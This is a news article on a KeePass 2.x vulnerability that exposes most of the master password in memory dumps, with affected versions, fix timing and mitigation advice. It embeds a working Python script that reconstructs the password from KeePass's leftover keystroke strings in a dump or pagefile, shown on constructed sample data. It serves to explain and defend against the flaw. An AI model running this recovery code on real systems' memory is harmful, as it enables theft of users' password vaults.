KeePass password manager users may want to be extra vigilant over the next few weeks. A newly discovered vulnerability allows the master password to be retrieved in plain text from memory, even when the database is locked or the program has been closed. And while a fix is in progress, it won't arrive until early June at the earliest.
As reported by Bleeping Computer (which covers the issue in full technical detail), a security researcher known as vdohney published a proof-of-concept tool that shows the exploit in action. An attacker who can obtain a memory dump (of the KeePass process, or of the whole system, including the pagefile or hibernation file) can recover most of the master password in plain text, even when the workspace is locked or KeePass is no longer running. The first one or two characters of the password are not present in memory, but the rest is, so the missing characters can be guessed to obtain the entire string.
For those unfamiliar with memory dumping vulnerabilities, think of the KeePass master password as loose change in your pants pocket. Shake the pants and you'll have almost the entire dollar (so to speak) needed to buy entry to the database, but those coins shouldn't be floating around in that pocket to begin with.
The proof-of-concept tool demonstrates the issue on Windows, but Linux and macOS are also believed to be at risk, because the problem is in KeePass itself, not in the operating system. Running KeePass under a standard (non-administrator) Windows account does not help either: a user can dump the memory of their own processes without administrative privileges. To perform the attack, the malicious actor needs either remote access to the computer (for example through malware) or physical access to it.
All current versions of KeePass 2.x (e.g. 2.53.1) are affected. KeePass 1.x (the older branch, which is still maintained), KeePassXC, and Strongbox, other password managers that can open KeePass database files, are not affected, according to vdohney.
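To make the "memory dump minus the first character" behaviour concrete, here is an added example, not vdohney's proof-of-concept tool and not code from the KeePass project. The page does not describe the bug's internals; the example assumes the widely reported mechanism behind it: each keystroke in the master-password box leaves a UTF-16LE string in process memory made of mask characters (U+25CF, the bullet KeePass displays) followed by the character just typed, so for "Password" the dump holds "●a", "●●s", "●●●s", and so on, and nothing usable for the first character. The function names (`find_leftovers`, `reconstruct`, `simulate_keystrokes`), the `SAMPLE_DUMP` bytes and the keystroke log are all constructed for this illustration.

```python
"""Recover most of a KeePass 2.x master password from a memory image.

Added example, not the researcher's PoC. Assumes the reported mechanism:
every keystroke in the master-password box leaves a UTF-16LE string of
mask characters (U+25CF) followed by the character just typed. The first
character never gets such a string, so it has to be guessed.
"""
import re
from collections import defaultdict

MASK = "\u25cf"                            # bullet shown for each typed character
MASK_UTF16LE = MASK.encode("utf-16-le")    # b'\xcf\x25'

# One leftover string: one or more masks followed by a single typed character.
# Printable ASCII only, to keep the example short.
_LEFTOVER = re.compile(rb"((?:\xcf\x25)+)([\x20-\x7e]\x00)")


def find_leftovers(dump: bytes) -> dict:
    """Return {position: {char: count}} for every leftover string in the dump.

    `position` is the 0-based index of the character in the password, which
    equals the number of mask characters in front of it.
    """
    found = defaultdict(lambda: defaultdict(int))
    for m in _LEFTOVER.finditer(dump):
        position = len(m.group(1)) // len(MASK_UTF16LE)
        char = m.group(2).decode("utf-16-le")
        found[position][char] += 1
    return {p: dict(c) for p, c in found.items()}


def reconstruct(dump: bytes, unknown: str = "?") -> tuple:
    """Rebuild the password as far as the dump allows.

    Returns (guess, alternatives). Position 0 is always `unknown`; a position
    with one clear winner takes it; a position whose candidates tie (e.g. a
    typo that was backspaced and retyped) becomes `unknown` and its candidates
    are listed in `alternatives`. Positions never seen are also `unknown`.
    """
    found = find_leftovers(dump)
    if not found:
        return "", {}
    guess, alternatives = [unknown], {}
    for pos in range(1, max(found) + 1):
        candidates = found.get(pos, {})
        if not candidates:
            guess.append(unknown)
            continue
        best = max(candidates.values())
        winners = [c for c, n in candidates.items() if n == best]
        if len(winners) == 1:
            guess.append(winners[0])
        else:
            guess.append(unknown)
            alternatives[pos] = sorted(candidates)
    return "".join(guess), alternatives


def simulate_keystrokes(keys: str) -> bytes:
    """Constructed sample data: the leftover strings one session would leave
    for a keystroke sequence. '\b' is backspace and is assumed to leave
    nothing; NUL separators keep neighbouring strings from merging."""
    text, chunks = "", []
    for k in keys:
        if k == "\b":
            text = text[:-1]
            continue
        if text:                               # first character leaves nothing usable
            chunks.append((MASK * len(text) + k).encode("utf-16-le"))
        text += k
    return b"\x00\x00" + b"\x00\x00".join(chunks) + b"\x00\x00"


# Constructed "memory dump": unrelated heap data around the leftovers of a
# user who typed "Passwoe", hit backspace, then finished with "rd".
SAMPLE_DUMP = (
    b"KeePass.exe heap data, unrelated strings, \x00\x00"
    + simulate_keystrokes("Passwoe\brd")
    + b"\x00" * 32 + b"more unrelated data\x00"
)

if __name__ == "__main__":
    guess, alternatives = reconstruct(SAMPLE_DUMP)
    print(guess, alternatives)                 # ?asswo?d {6: ['e', 'r']}
```

Run against a real dump, the same scan would be pointed at a process minidump or at the pagefile and hibernation file, which is why the article's advice to clear those files matters: the leftover strings survive there after KeePass has exited.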
The vulnerability will be fixed in KeePass version 2.54, which will likely be released in early June. Dominik Reichl, the developer of KeePass, gave this estimate on the SourceForge forum, with the caveat that the time frame is not guaranteed. An unstable beta build of KeePass with security mitigations is already available, and Bleeping Computer reports that the creator of the proof-of-concept exploit cannot reproduce the issue with the fixes applied.
However, even after upgrading to the fixed stable version, the master password may still linger in memory remnants written to disk, such as the pagefile (swap) or hibernation file, while a vulnerable version was running. To rule that out completely, you would have to wipe the computer using a mode that overwrites existing data and then freshly reinstall the operating system.
That is a very drastic step, though. More reasonably: do not allow untrusted individuals to access your computer, do not click on unknown links, and do not install unknown software. A good antivirus program (such as one of our top recommendations) also helps. Once you are on the fixed stable version of KeePass, change your master password after upgrading; doing so makes the previous password worthless even if a copy of it is still lurking in those memory remnants.
You can also reduce exposure by restarting your computer, clearing the hibernation and swap files, and temporarily opening the KeePass database in an unaffected alternative such as KeePassXC instead. Device encryption helps against a physical attack on your computer (or against someone mining this information after you donate or dispose of it). There are ways to stay protected, and fortunately this appears to be a proof-of-concept concern so far, with no active exploitation reported.